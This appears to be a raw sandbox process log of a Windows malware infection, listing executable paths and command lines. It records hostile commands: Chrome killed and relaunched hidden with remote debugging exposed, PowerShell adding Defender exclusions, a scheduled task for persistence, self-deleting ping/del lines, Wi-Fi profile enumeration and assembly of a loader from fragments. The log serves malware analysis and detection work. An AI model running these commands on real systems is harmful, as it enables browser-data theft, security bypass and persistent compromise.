C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{73f494c0-76ee-4a8d-b7ea-7c4a71dcaf44}

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\Client-built.exe

"C:\Users\Admin\Desktop\Files\Client-built.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime" /sc ONLOGON /tr "C:\Windows\system32\runtime.exe" /rl HIGHEST /f

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\system32\runtime.exe

"C:\Windows\system32\runtime.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Runtime" /sc ONLOGON /tr "C:\Windows\system32\runtime.exe" /rl HIGHEST /f

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\explorer.exe

explorer.exe

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\SysWOW64\cmd.exe

cmd /c md 704579

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SysWOW64\findstr.exe

findstr /V "MARTNMSPIDERRINGTONE" Mh

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\v7wa24td.exe

"C:\Users\Admin\Desktop\Files\v7wa24td.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\kp8dnpa9.exe

"C:\Users\Admin\Desktop\Files\kp8dnpa9.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\test19.exe

"C:\Users\Admin\Desktop\Files\test19.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\chcp.com

chcp 65001

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Users\Admin\Desktop\Files\kp8dnpa9.exe

"C:\Users\Admin\Desktop\Files\kp8dnpa9.exe"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6200 -ip 6200

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 324

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1936 /prefetch:2

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2388 /prefetch:3

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2424 /prefetch:8

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4472,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4504 /prefetch:1

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\AppData\Local\Temp\704579\Organizational.pif

Organizational.pif u

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5096,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5080 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5196,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5188 /prefetch:8

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\explorer.exe

explorer.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

